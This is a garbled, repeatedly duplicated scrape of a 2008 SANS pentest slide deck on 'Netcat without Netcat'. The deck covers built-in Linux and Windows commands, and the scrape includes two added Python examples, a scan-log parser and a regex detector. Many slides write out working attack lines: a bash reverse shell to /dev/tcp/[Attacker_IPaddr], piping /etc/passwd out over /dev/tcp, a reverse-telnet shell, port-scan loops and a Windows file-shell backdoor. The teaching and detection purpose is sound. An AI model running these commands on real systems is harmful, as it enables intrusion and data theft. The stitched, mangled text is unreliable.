bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
What Is Netcat Without Netcat?
• Netcat without Netcat involves constructing commands that achieve Netcat behavior…
– …without the use of Netcat
• We'll rely on built-in tools only
• Remember those old AT&T commercials?
– Have you ever kissed your baby goodnight… from a payphone?
– Have you ever made a command shell backdoor using Linux's /dev/tcp?
– Have you ever shoveled shell using Linux telnet clients?
– Have you ever made a port scanner using a Windows FTP client?
– Have you ever made the Windows file system behave like a command shell?
• YOU WILL
Why Netcat without Netcat?
• For penetration testers:
– Netcat functionality is very useful in making one system attack another machine
– But the project's rules of engagement may prohibit installation of additional software such as Netcat on compromised targets
– Some anti-virus tools detect and block Netcat
– Live off the land: Be a command-line MacGyver
– Where we're going, we don't need Netcat
[Diagram: the attacker has shell access on a conquered target and uses it to scan, analyze and exploit the next target]
Useful Netcat Functions
• As we've seen, Netcat can be used in countless different ways
• Let's pick some of the most useful and see how we can make built-in tools do each function on Linux and Windows:
– Backdoor shell
– File transfer
– Port scanner
• We'll vary the order in which we do each action, as we'll build from fundamental principles to more complex techniques
– And the order of those principles differs between Linux and Windows
Linux
• /dev/tcp rocks
• On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port]
– Opens a connection with the target IPaddr on that port
• With a little command-line magic, we can use this for Netcat-like behavior
Linux Command-Line File Transfer
• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in:
$ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener
Linux Command-Line Backdoor via /dev/tcp
• We can connect Standard In, Standard Out and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor:
/bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1
• Shovels a shell from the victim Linux machine to attacker's waiting Netcat listener, where commands can be entered
[Diagram: a protected server behind a firewall that blocks incoming connections runs "/bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1"; the attacker runs "nc -l -p [p]", types commands there, and they are executed on the server]
Linux Command-Line Reverse Shell Backdoor In Action
Linux Command-Line Port Scanner
• To see if a single port is open, we could run:
$ echo > /dev/tcp/[IPaddr]/[port]
• Note that the "Connection refused" text is not placed on Standard Output or Standard Error
– The shell itself prints it in line, so we cannot redirect it to a file
[Screenshot: probing a target on which port 80 is listening]
Storing Results and Iterating
• But it does set the error condition variable "$?" to 0 if the port is open, 1 if it is closed
• For a port scanner, we could use a while loop that increments through port numbers:
$ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done
• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
– I want this to be as operationally clean as possible for pen testers
Command-Line Port Scanner In Action
[Screenshot: command-line port scanner output; the visible fragment reads "5 Not Closed"]
Linux Command-Line Backdoor via "Reverse Telnet"
• There's a whole different way we can get remote shell without using /dev/tcp
• Linux telnet clients let us redirect Standard In and Standard Out
• Gives rise to "Reverse telnet"
• On target machine, we could run:
$ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]
• Provide commands on attacker's machine via port1
• Receive output on attacker's machine on port2
Reverse Telnet Shell in Action
Windows
• Built-in command-line has very clunky syntax
• Also, telnet and ftp clients are absolutely atrocious
– Especially in the way that they (don't) interact with Standard In and Standard Out
• Thus, we will build Netcat-without-Netcat from some fundamental command-line building blocks in Windows
Building Blocks: Windows FOR Loops
• Iteration can be very helpful
– We're not expecting you to be programmers
– But sometimes you'll want to iterate over a given set of items:
• Numbers
• Lines in a file
• The Windows command line supports several kinds of FOR loops… some of the most useful are:
– FOR /L: Counter
– FOR /F: Iterate over file contents, strings, or command output
• See the first webcast in this series for details on how these work… we won't go through them again here
Windows Port Scanner Using Telnet Client
• We could systematically telnet to port after port:
– C:\> for /L %i in (1,1,1024) do telnet [IPaddr] %i
• Problem: When it finds an open port, it hangs
• How to address?
– Watch it… When it stops, hit CTRL-[ and then type quit to resume
– Or kill the telnet client every 5 seconds:
• C:\> for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete & ping -n 6 127.0.0.1
– Downside: Race condition may kill one that hasn't finished checking
More Problems with Windows Telnet Client as a Port Scanner
• Other problems:
– Results aren't logged
• You can't do anything with Standard Out of telnet client
– Attempts at redirection either make it hang or not run
• And the logging option of the Windows telnet client (-l [filename]) overwrites all earlier logs… No append option
• So you have to watch it, sadly
– Most versions of Vista do not include telnet client by default
• But Netcat without Netcat is about living off the land
• There must be a better way
Windows Port Scanner Using FTP Client
• Windows FTP client: C:\> ftp [IPaddr]
• Problem: Can't specify port to connect to on the invocation command line… only connects to TCP port 21
• Solution: But you can specify dest port in an FTP command file:
– open [IPaddr] [port]
• Then the ftp client can read the contents of that file and do what it says by being invoked with:
– C:\> ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration
The Windows Command Line Port Scanner Using FTP Client
• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
• Problem: It hangs for about 30 seconds on an open port, then moves on
– That's not so bad
• Another Problem: It doesn't store results
– We can fix that, but it gets a little ugly
Making It Store Results
• C:\> for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt
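As an added example (not part of the deck or Ed Skoudis' material), the Python below reads a ports.txt file of the kind the loop above leaves behind and recovers which ports the scan found open. It assumes exactly what the slide describes: each iteration appends a "Checking Port N" line, ftp's connection errors for a closed port follow it via 2>>, and a successful connection leaves no error line. The sample file content is constructed and the error wording is only illustrative; the parser does not depend on it. From an incident-response view, ftp.txt and ports.txt found on a host are artifacts of this technique, and parsing them tells you what the intruder learned.

```python
"""Recover scan results from a ports.txt artifact of the FTP-client scanner.

Added example for this page, not Ed Skoudis' code. Assumes the layout the
slide's loop produces: "Checking Port N" per iteration, followed by whatever
ftp wrote to stderr (2>>) for that port. A port with no error lines after it
connected successfully. Sample content is constructed; the error wording is
illustrative and the parser does not depend on it.
"""
import re

CHECK_RE = re.compile(r"^Checking Port (\d+)$")

# Constructed sample: what ports.txt might hold when copied mid-scan
SAMPLE_PORTS_TXT = """\
Checking Port 21
> ftp: connect :Connection refused
Checking Port 22
> ftp: connect :Connection refused
Checking Port 80
Checking Port 135
Checking Port 443
> ftp: connect :Connection refused
Checking Port 445
"""


def parse_ports_txt(text):
    """Map each probed port (in scan order) to the error lines logged for it."""
    results = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = CHECK_RE.match(line)
        if m:
            current = int(m.group(1))
            results[current] = []
        elif current is not None:
            # anything that is not a "Checking Port" line is ftp stderr
            # output appended for the most recent port
            results[current].append(line)
    return results


def summarize(text):
    """Classify ports as open, closed, or inconclusive.

    The final "Checking Port" entry is reported as inconclusive rather than
    open when it has no error lines: the scan may simply have been stopped
    (or ftp may still be hanging on that port, which the slide says takes
    about 30 seconds) before anything was written for it.
    """
    results = parse_ports_txt(text)
    ports = list(results)
    last = ports[-1] if ports else None
    summary = {"open": [], "closed": [], "inconclusive": []}
    for port in ports:
        if results[port]:
            summary["closed"].append(port)
        elif port == last:
            summary["inconclusive"].append(port)
        else:
            summary["open"].append(port)
    return summary


if __name__ == "__main__":
    s = summarize(SAMPLE_PORTS_TXT)
    for state in ("open", "closed", "inconclusive"):
        print(f"{state:12s} {s[state]}")
```

Because the loop appends rather than overwrites, the file is in scan order, and the presence or absence of text after each "Checking Port" line is the only signal needed; that is also why the last entry must be treated with care.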
Windows Command-Line File Transfer
• File transfer on arbitrary ports is hard
• But we can use Windows file and print sharing on the command line, redirecting to shares
• C:\> type [filename] > \\[machine]\[share]\[filename]
• Will use current user credentials…
• Or, if you want different credentials, first do a:
– C:\> net use \\[machine] [password] /u:[user]
• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
– Because we can redirect the output of commands across the network, not just files
File Transfer in Action
Backdoors: The File Shell
• Now, let's do a backdoor
• Listening on a port is hard…
• But we can look in the file system
• A FOR loop can spin, looking for a command in a file, run the command, and dump output to another file
• C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1
Using the File Shell
• Now we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block…
– Other folks are starting to use it, extending the idea
– Use FTP client to move commands on arbitrary ports, writing them into the file system
– Or rely on nslookup to pull domain names that include commands
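Added example, not from the deck: a small Python detector that flags the Linux and Windows "Netcat without Netcat" command lines covered in this section (the /dev/tcp redirects and reverse shell, reverse telnet, the FOR /L telnet and FTP scanners, the wmic telnet killer and the file-shell loop) in process-creation records. It assumes one command line per record, as you would extract from auditd EXECVE events or Windows 4688/Sysmon CommandLine fields; the sample records and the rule names are constructed. Patterns are deliberately loose on quoting and whitespace, and the "step 0" FOR /L rule catches the never-ending loop idiom the deck uses twice, regardless of what the loop body runs.

```python
"""Flag "Netcat without Netcat" command lines in process-creation records.

Added example for this page, not Ed Skoudis' code. Input: one command
line per record (assumed extracted from auditd EXECVE events or Windows
4688 / Sysmon event 1 CommandLine fields). Sample records are constructed.
"""
import re

# Each rule is (name, compiled regex); names are labels chosen here.
RULES = [
    # bash "/dev/tcp/host/port" redirection: file transfer or port probe
    ("linux_devtcp_redirect",
     re.compile(r"/dev/tcp/[^/\s]+/\d+")),
    # interactive shell whose streams are tied to /dev/tcp
    ("linux_devtcp_reverse_shell",
     re.compile(r"(?:ba)?sh\s+-i\b.*/dev/tcp/")),
    # telnet | shell | telnet "reverse telnet" pipeline
    ("linux_reverse_telnet",
     re.compile(r"telnet\s+\S+\s+\d+\s*\|\s*(?:/bin/)?(?:ba)?sh\b\s*\|\s*telnet\s+\S+")),
    # FOR /L with step 0 never terminates: the deck's polling idiom
    ("windows_infinite_for_loop",
     re.compile(r"for\s+/L\s+%+\w\s+in\s*\(\s*\d+\s*,\s*0\s*,\s*\d+\s*\)", re.I)),
    # FOR /L driving telnet across a port range
    ("windows_telnet_for_loop_scan",
     re.compile(r"for\s+/L\s+%+\w\s+in\s*\([^)]*\)\s+do\s+telnet\b", re.I)),
    # wmic used to kill hung telnet clients
    ("windows_wmic_telnet_kill",
     re.compile(r"wmic\s+process\s+where\s+name=[\"']?telnet\.exe[\"']?\s+delete", re.I)),
    # scripted ftp "open host port" from a generated command file
    ("windows_ftp_script_scan",
     re.compile(r"echo\s+open\s+\S+\s+%+\w.*ftp\s+-s:", re.I)),
    # file shell: endless loop reading a command file, running it, deleting it
    ("windows_file_shell_loop",
     re.compile(r"for\s+/L\s+%+\w\s+in\s*\(\s*\d+\s*,\s*0\s*,\s*\d+\s*\)"
                r".*for\s+/F.*cmd(?:\.exe)?\s+/c\s+%+\w.*del\s+\S+", re.I)),
]

# Constructed sample records (not real telemetry); 10.0.0.x are placeholders
SAMPLE_LOG = [
    "/bin/bash -i > /dev/tcp/10.0.0.5/4444 0<&1 2>&1",
    "cat /etc/passwd > /dev/tcp/10.0.0.5/4444",
    "telnet 10.0.0.5 4444 | /bin/bash | telnet 10.0.0.5 4445",
    "ssh deploy@10.0.0.5",                                   # benign
    "for /L %i in (1,1,1024) do telnet 10.0.0.7 %i",
    'for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete & ping -n 6 127.0.0.1',
    "for /L %i in (1,1,1024) do echo open 10.0.0.7 %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt",
    'for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1',
    "ftp ftp.example.com",                                   # benign
    "for /L %i in (1,1,5) do echo %i",                       # benign
]


def classify(cmdline):
    """Return the names of all rules that fire on one command line, in rule order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(records):
    """Return (index, command line, rule names) for every record that fires a rule."""
    hits = []
    for i, line in enumerate(records):
        names = classify(line)
        if names:
            hits.append((i, line, names))
    return hits


if __name__ == "__main__":
    for i, line, names in scan(SAMPLE_LOG):
        print(f"[{i}] {', '.join(names)}: {line}")
```

A record that fires more than one rule (the reverse shell is both a /dev/tcp redirect and an interactive shell; the file shell is both an endless loop and a command-file reader) is the strongest signal, which is why classify returns every matching name rather than stopping at the first.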
The File Shell In Action
Outline
• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 13
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13
Why Netcat without Netcatbull For penetration testers
ndash Netcat functionality is very useful in making one systemattack another machine
ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on
compromised targets ndash Some anti-virus tools detect and block Netcat
ndash Live off the land Be a command-line MacGyver
ndash Where wersquore going we donrsquot need Netcat
Attacker
ConqueredTarget
Next Target
S h e l l
a c c ess
sca na na ly z eex p lo it
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14
Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless
different waysbull Letrsquos pick some of the most useful and see how we
can make built-in tools do each function on Linux and
Windows ndash Backdoor shell
ndash File transfer
ndash Port scanner
bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques
ndash And the order of those principles differs between Linux andWindows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15
Linuxbull devtcp rocks
bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]
ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for
Netcat-like behavior
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16
Linux Command-Line File
Transfer
bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in
bull $ cat etcpasswd gt
devtcp[IPaddr][port]bull Catch it on the other side with a Netcat
listener
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
Useful Netcat Functions
• As we've seen, Netcat can be used in countless different ways
